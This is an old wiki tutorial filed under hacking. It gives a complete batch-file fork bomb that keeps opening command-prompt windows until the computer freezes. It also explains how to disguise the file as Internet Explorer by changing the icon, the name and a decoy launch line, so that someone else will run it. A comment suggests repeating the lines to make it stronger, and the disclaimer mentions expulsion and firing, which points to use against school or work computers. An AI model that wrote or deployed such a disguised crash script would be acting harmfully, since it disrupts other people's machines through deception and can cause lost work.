Batch file to crash a computerThis is a featured page


This time I will be showing you how to create a batch file to crash a computer.

This was posted for educational purposes only, I am not to be held responcible for any inappropriate usage of this information or the files that I may have provided. I am not to be held responsible for individuals or groups of people that suffer consequences of using this information or the files that I provided, these consequences include things such as expulsion, getting fired, or legal action.

Step 1: The code

As usual we will begin by opening notepad. What this script will do is open command prompt six times then continuously loop so it will continue to open command prompt continuously until the computer freezes up or is turned off, this will not to any harm to the computer.

This is one of the most simple scripts ever. Just type

start
start
start
start
start
start
start crash

Then save the file as a batch file by putting .bat at the end of the file name while saving.
You will have to save the file name as crash.bat unless you change the bottom line of the script to a different name like
start launch

or

whatever just if you wanna name the file something else change the last line of the code to something else.

Also if you want to make it more fun create a shortcut to your batch file, you can name the shortuc whatever you want, then right click on the shortcut go to properties then go to change icon, you can make the icon internet explorer and name the shortcut internet explorer.

To make this even more believeable at the top of the script above the first start you can put these two lines

@echo off
start C:\Program Files\Internet Explorer\iexplore.exe
So your final code would look like this
@echo off
start C:\Program Files\Internet Explorer\iexplore.exe
start
start
start
start
start
start

Batch file to crash a computer - Hacking



naveen98859
naveen98859
Latest page update: made by naveen98859 , Aug 22 2008, 4:50 AM EDT (about this update About This Update naveen98859 Edited by naveen98859

84 words added

view changes

- complete history)
More Info: links to this page
Started By Thread Subject Replies Last Post
Anonymous makeing the code worse 1 Jun 21 2009, 9:22 PM EDT by Anonymous
 
Thread started: Jan 28 2009, 1:20 AM EST  Watch
if u want to make it more effective u can copy from were the starts ... start.. and all the way to your file name. then just past a lot of times .. like 20 times and then watch it go .. you'll never get it to stop and will end up having to reboot.
0  out of 2 found this valuable. Do you?    
Keyword tags: None (edit keyword tags)
Show Last Reply
Anonymous cdfv 0 Apr 1 2009, 3:20 PM EDT by Anonymous
 
Thread started: Apr 1 2009, 3:20 PM EDT  Watch
nkbkhbvfvvvvv

xdsacsfgv w2w
0  out of 3 found this valuable. Do you?    
Keyword tags: None (edit keyword tags)

Anonymous  (Get credit for your thread)


Showing 2 of 2 threads for this page